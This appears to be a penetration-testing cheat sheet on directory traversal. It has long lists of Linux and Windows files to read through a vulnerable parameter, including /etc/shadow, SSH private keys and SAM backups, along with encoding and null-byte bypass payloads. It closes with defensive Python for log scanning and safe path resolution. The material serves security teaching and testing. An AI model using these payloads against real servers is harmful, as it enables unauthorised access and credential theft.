# Directory Traversal

<mark style="color:orange;">If a web application does not sanitize a file path parameter, or sanitizes it poorly, we can include our own files or traverse the file system to leak data.</mark>

## Example:

After clicking the “Menu” link, the URL is updated and contains a parameter named file with a value of “current\_menu.php”.

![](/files/-Mcqo_XmJWDvg19HGGkd)

The file extension on a parameter value is usually a good indication that we should investigate further, because it suggests text or code is being included from a different resource. Most directory traversals are not this obvious, but a fair number of old PHP applications load pages in a similar fashion.\
**More examples at:**\
<https://owasp.org/www-community/attacks/Path_Traversal>

{% tabs %}
{% tab title="Simple DirTrav Tests" %}
**Globally readable:**\
Linux: <mark style="color:green;">/etc/passwd</mark>\
Windows: <mark style="color:green;">c:\boot.ini</mark>, <mark style="color:green;">c:\windows\system32\drivers\etc\hosts</mark>, <mark style="color:green;">\windows\win.ini</mark>\
Depending on the web server and app, you may need to use forward slashes (/).
{% endtab %}

{% tab title="Win Process Brute" %}
Using Burp or a script, you can brute-force paths by guessing the process ID and file descriptor numbers:

/proc/\<int>/fd/\<int>\
e.g.\
/proc/2116/fd/11
{% endtab %}

{% tab title="\*nix Paths" %}
*COMMON PATHS:*\
/etc/passwd\
/etc/shadow\
/etc/aliases\
/etc/anacrontab\
/etc/apache2/apache2.conf\
/etc/apache2/httpd.conf\
/etc/at.allow\
/etc/at.deny\
/etc/bashrc\
/etc/bootptab\
/etc/chrootUsers\
/etc/chttp.conf\
/etc/cron.allow\
/etc/cron.deny\
/etc/crontab\
/etc/cups/cupsd.conf\
/etc/exports\
/etc/fstab\
/etc/ftpaccess\
/etc/ftpchroot\
/etc/ftphosts\
/etc/groups\
/etc/grub.conf\
/etc/hosts\
/etc/hosts.allow\
/etc/hosts.deny\
/etc/httpd/access.conf\
/etc/httpd/conf/httpd.conf\
/etc/httpd/httpd.conf\
/etc/httpd/logs/access\_log\
/etc/httpd/logs/access.log\
/etc/httpd/logs/error\_log\
/etc/httpd/logs/error.log\
/etc/httpd/php.ini\
/etc/httpd/srm.conf\
/etc/inetd.conf\
/etc/inittab\
/etc/issue\
/etc/lighttpd.conf\
/etc/lilo.conf\
/etc/logrotate.d/ftp\
/etc/logrotate.d/proftpd\
/etc/logrotate.d/vsftpd.log\
/etc/lsb-release\
/etc/motd\
/etc/modules.conf\
/etc/mtab\
/etc/my.cnf\
/etc/my.conf\
/etc/mysql/my.cnf\
/etc/network/interfaces\
/etc/networks\
/etc/npasswd\
/etc/php4.4/fcgi/php.ini\
/etc/php4/apache2/php.ini\
/etc/php4/apache/php.ini\
/etc/php4/cgi/php.ini\
/etc/php5/apache2/php.ini\
/etc/php5/apache/php.ini\
/etc/php/apache2/php.ini\
/etc/php/apache/php.ini\
/etc/php/cgi/php.ini\
/etc/php.ini\
/etc/php/php4/php.ini\
/etc/php/php.ini\
/etc/printcap\
/etc/profile\
/etc/proftp.conf\
/etc/proftpd/proftpd.conf\
/etc/pure-ftpd.conf\
/etc/pureftpd.passwd\
/etc/pureftpd.pdb\
/etc/pure-ftpd/pure-ftpd.conf\
/etc/pure-ftpd/pure-ftpd.pdb\
/etc/pure-ftpd/putreftpd.pdb\
/etc/redhat-release\
/etc/resolv.conf\
/etc/samba/smb.conf\
/etc/snmpd.conf\
/etc/ssh/ssh\_config\
/etc/ssh/sshd\_config\
/etc/ssh/ssh\_host\_dsa\_key\
/etc/ssh/ssh\_host\_dsa\_key.pub\
/etc/ssh/ssh\_host\_key\
/etc/ssh/ssh\_host\_key.pub\
/etc/sysconfig/network\
/etc/syslog.conf\
/etc/termcap\
/etc/vhcs2/proftpd/proftpd.conf\
/etc/vsftpd.chroot\_list\
/etc/vsftpd.conf\
/etc/vsftpd/vsftpd.conf\
/etc/wu-ftpd/ftpaccess\
/etc/wu-ftpd/ftphosts\
/etc/wu-ftpd/ftpusers\
/logs/pure-ftpd.log\
/logs/security\_debug\_log\
/logs/security\_log\
/opt/lampp/etc/httpd.conf\
/opt/xampp/etc/php.ini\
/proc/cpuinfo\
/proc/filesystems\
/proc/interrupts\
/proc/ioports\
/proc/meminfo\
/proc/modules\
/proc/mounts\
/proc/stat\
/proc/swaps\
/proc/version\
/proc/self/net/arp\
/root/anaconda-ks.cfg\
/usr/etc/pure-ftpd.conf\
/usr/lib/php.ini\
/usr/lib/php/php.ini\
/usr/local/apache/conf/modsec.conf\
/usr/local/apache/conf/php.ini\
/usr/local/apache/log\
/usr/local/apache/logs\
/usr/local/apache/logs/access\_log\
/usr/local/apache/logs/access.log\
/usr/local/apache/audit\_log\
/usr/local/apache/error\_log\
/usr/local/apache/error.log\
/usr/local/cpanel/logs\
/usr/local/cpanel/logs/access\_log\
/usr/local/cpanel/logs/error\_log\
/usr/local/cpanel/logs/license\_log\
/usr/local/cpanel/logs/login\_log\
/usr/local/cpanel/logs/stats\_log\
/usr/local/etc/httpd/logs/access\_log\
/usr/local/etc/httpd/logs/error\_log\
/usr/local/etc/php.ini\
/usr/local/etc/pure-ftpd.conf\
/usr/local/etc/pureftpd.pdb\
/usr/local/lib/php.ini\
/usr/local/php4/httpd.conf\
/usr/local/php4/httpd.conf.php\
/usr/local/php4/lib/php.ini\
/usr/local/php5/httpd.conf\
/usr/local/php5/httpd.conf.php\
/usr/local/php5/lib/php.ini\
/usr/local/php/httpd.conf\
/usr/local/php/httpd.conf.ini\
/usr/local/php/lib/php.ini\
/usr/local/pureftpd/etc/pure-ftpd.conf\
/usr/local/pureftpd/etc/pureftpd.pdn\
/usr/local/pureftpd/sbin/pure-config.pl\
/usr/local/www/logs/httpd\_log\
/usr/local/Zend/etc/php.ini\
/usr/sbin/pure-config.pl\
/var/adm/log/xferlog\
/var/apache2/config.inc\
/var/apache/logs/access\_log\
/var/apache/logs/error\_log\
/var/cpanel/cpanel.config\
/var/lib/mysql/my.cnf\
/var/lib/mysql/mysql/user.MYD\
/var/local/www/conf/php.ini\
/var/log/apache2/access\_log\
/var/log/apache2/access.log\
/var/log/apache2/error\_log\
/var/log/apache2/error.log\
/var/log/apache/access\_log\
/var/log/apache/access.log\
/var/log/apache/error\_log\
/var/log/apache/error.log\
/var/log/apache-ssl/access.log\
/var/log/apache-ssl/error.log\
/var/log/auth.log\
/var/log/boot\
/var/htmp\
/var/log/chttp.log\
/var/log/cups/error.log\
/var/log/daemon.log\
/var/log/debug\
/var/log/dmesg\
/var/log/dpkg.log\
/var/log/exim\_mainlog\
/var/log/exim/mainlog\
/var/log/exim\_paniclog\
/var/log/exim.paniclog\
/var/log/exim\_rejectlog\
/var/log/exim/rejectlog\
/var/log/faillog\
/var/log/ftplog\
/var/log/ftp-proxy\
/var/log/ftp-proxy/ftp-proxy.log\
/var/log/httpd/access\_log\
/var/log/httpd/access.log\
/var/log/httpd/error\_log\
/var/log/httpd/error.log\
/var/log/httpsd/ssl.access\_log\
/var/log/httpsd/ssl\_log\
/var/log/kern.log\
/var/log/lastlog\
/var/log/lighttpd/access.log\
/var/log/lighttpd/error.log\
/var/log/lighttpd/lighttpd.access.log\
/var/log/lighttpd/lighttpd.error.log\
/var/log/mail.info\
/var/log/mail.log\
/var/log/maillog\
/var/log/mail.warn\
/var/log/message\
/var/log/messages\
/var/log/mysqlderror.log\
/var/log/mysql.log\
/var/log/mysql/mysql-bin.log\
/var/log/mysql/mysql.log\
/var/log/mysql/mysql-slow\.log\
/var/log/proftpd\
/var/log/pureftpd.log\
/var/log/pure-ftpd/pure-ftpd.log\
/var/log/secure\
/var/log/vsftpd.log\
/var/log/wtmp\
/var/log/xferlog\
/var/log/yum.log\
/var/mysql.log\
/var/run/utmp\
/var/spool/cron/crontabs/root\
/var/webmin/miniserv.log\
/var/www/log/access\_log\
/var/www/log/error\_log\
/var/www/logs/access\_log\
/var/www/logs/error\_log\
/var/www/logs/access.log\
/var/www/logs/error.log\
\~/.atfp\_history\
\~/.bash\_history\
\~/.bash\_logout\
\~/.bash\_profile\
\~/.bashrc\
\~/.gtkrc\
\~/.login\
\~/.logout\
\~/.mysql\_history\
\~/.nano\_history\
\~/.php\_history\
\~/.profile\
\~/.ssh/authorized\_keys\
\~/.ssh/id\_dsa\
\~/.ssh/id\_dsa.pub\
\~/.ssh/id\_rsa\
\~/.ssh/id\_rsa.pub\
\~/.ssh/identity\
\~/.ssh/identity.pub\
\~/.viminfo\
\~/.wm\_style\
\~/.Xdefaults\
\~/.xinitrc\
\~/.Xresources\
\~/.xsession
{% endtab %}

{% tab title="Win Paths" %}
Root directory: `<partition letter>:\`\
Directory separator: `/` or `\`\
Note that Windows allows filenames to be followed by extra `. \ /` characters.\
\
C:/Users/Administrator/NTUser.dat\
C:/Documents and Settings/Administrator/NTUser.dat\
C:/apache/logs/access.log\
C:/apache/logs/error.log\
C:/apache/php/php.ini\
C:/boot.ini\
C:/inetpub/wwwroot/global.asa\
C:/MySQL/data/hostname.err\
C:/MySQL/data/mysql.err\
C:/MySQL/data/mysql.log\
C:/MySQL/my.cnf\
C:/MySQL/my.ini\
C:/php4/php.ini\
C:/php5/php.ini\
C:/php/php.ini\
C:/Program Files/Apache Group/Apache2/conf/httpd.conf\
C:/Program Files/Apache Group/Apache/conf/httpd.conf\
C:/Program Files/Apache Group/Apache/logs/access.log\
C:/Program Files/Apache Group/Apache/logs/error.log\
C:/Program Files/FileZilla Server/FileZilla Server.xml\
C:/Program Files/MySQL/data/hostname.err\
C:/Program Files/MySQL/data/mysql-bin.log\
C:/Program Files/MySQL/data/mysql.err\
C:/Program Files/MySQL/data/mysql.log\
C:/Program Files/MySQL/my.ini\
C:/Program Files/MySQL/my.cnf\
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log\
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf\
C:/Program Files/MySQL/MySQL Server 5.0/my.ini\
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf\
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf\
C:/Program Files (x86)/Apache Group/Apache/conf/access.log\
C:/Program Files (x86)/Apache Group/Apache/conf/error.log\
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml\
C:/Program Files (x86)/xampp/apache/conf/httpd.conf\
C:/WINDOWS/php.ini\
C:/WINDOWS/Repair/SAM\
C:/Windows/repair/system\
C:/Windows/repair/software\
C:/Windows/repair/security\
C:/WINDOWS/System32/drivers/etc/hosts\
C:/Windows/win.ini\
C:/WINNT/php.ini\
C:/WINNT/win.ini\
C:/xampp/apache/bin/php.ini\
C:/xampp/apache/logs/access.log\
C:/xampp/apache/logs/error.log\
C:/Windows/Panther/Unattend/Unattended.xml\
C:/Windows/Panther/Unattended.xml\
C:/Windows/debug/NetSetup.log\
C:/Windows/system32/config/AppEvent.Evt\
C:/Windows/system32/config/SecEvent.Evt\
C:/Windows/system32/config/default.sav\
C:/Windows/system32/config/security.sav\
C:/Windows/system32/config/software.sav\
C:/Windows/system32/config/system.sav\
C:/Windows/system32/config/regback/default\
C:/Windows/system32/config/regback/sam\
C:/Windows/system32/config/regback/security\
C:/Windows/system32/config/regback/system\
C:/Windows/system32/config/regback/software\
C:/Program Files/MySQL/MySQL Server 5.1/my.ini\
C:/Windows/System32/inetsrv/config/schema/ASPNET\_schema.xml\
C:/Windows/System32/inetsrv/config/applicationHost.config\
C:/inetpub/logs/LogFiles/W3SVC1/u\_ex\[YYMMDD].log
{% endtab %}

{% tab title="Encodings" %}
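| Character | URL encoding | %u encoding |
| --- | --- | --- |
| `.` | `%2e` | `%u002e` |
| `/` | `%2f` | `%u2215` |
| `\` | `%5c` | `%u2216` |

Mix and match these, e.g.:

`%2e%2e%2f`

`..%2f`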
{% endtab %}
{% endtabs %}
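
For reviewing access logs, the encodings in the table above can be undone before matching. This is an added example, not part of the original page: it decodes `%XX` and `%uXXXX` layers repeatedly, folds the two look-alike separators to ASCII, and flags query parameters whose canonical value contains a `..` segment. The log lines, function names and round limit are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (sample data, not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?file=current_menu.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1830',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?file=..%u2215..%u2215etc%u2215hosts HTTP/1.1" 404 0',
]

PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")              # non-standard %uXXXX escape
FOLD = str.maketrans({"\u2215": "/", "\u2216": "\\"})  # look-alike separators
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")      # a ".." path segment
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def canonicalize(value, max_rounds=5):
    """Decode %XX and %uXXXX layers until the value stops changing."""
    for _ in range(max_rounds):
        decoded = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded).translate(FOLD)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(target):
    """Return (param, canonical value) for parameters holding a '..' segment."""
    hits = []
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        canon = canonicalize(raw)
        if TRAVERSAL.search(canon):
            hits.append((name, canon))
    return hits

def scan(lines):
    """Return (line number, param, canonical value) for each flagged request."""
    found = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        for name, canon in (flag_request(m.group(1)) if m else []):
            found.append((no, name, canon))
    return found

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a successful read; correlate it with the response status and size before escalating.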

## Null Byte:

In many operating systems, a null byte (`%00`) can be injected to terminate the filename. For example, sending a parameter like:\
`?file=secret.doc%00.pdf`\
will result in the Java application seeing a string that ends with “.pdf”, while the operating system sees a file that ends in “.doc”. Attackers may use this trick to bypass validation routines.

{% hint style="info" %}
Null bytes do not work with PHP >= 5.3.4
{% endhint %}
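
The validation gap described above, next to a hardened resolver for a `file`-style parameter. This is an added example, not code from the original page: `naive_check` shows the suffix-only test that a null byte defeats, and `resolve_safe` rejects control characters, applies an extension allowlist, and confines the resolved path to a base directory. `BASE_DIR`, `ALLOWED_EXT` and both function names are assumptions.

```python
import os

BASE_DIR = "/var/www/app/pages"   # assumed directory holding includable pages
ALLOWED_EXT = {".php", ".pdf"}    # assumed allowlist of extensions

def naive_check(name):
    """The weak pattern: only looks at how the string ends."""
    return name.endswith(".pdf")

def resolve_safe(name, base_dir=BASE_DIR):
    """Return the absolute path for `name` inside base_dir, or raise ValueError."""
    # Reject NUL and other control characters before any path handling.
    if any(ord(c) < 0x20 for c in name):
        raise ValueError("control character in file name")
    # Allowlist on the real extension; a trailing "." or "/" yields a
    # non-matching extension and is refused as well.
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # Resolve "..", absolute paths and symlinks, then check containment.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory")
    return target

if __name__ == "__main__":
    for candidate in ["current_menu.php", "secret.doc\x00.pdf", "../secret.pdf"]:
        try:
            print(repr(candidate), "->", resolve_safe(candidate))
        except ValueError as exc:
            print(repr(candidate), "rejected:", exc, "| naive:", naive_check(candidate))
```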


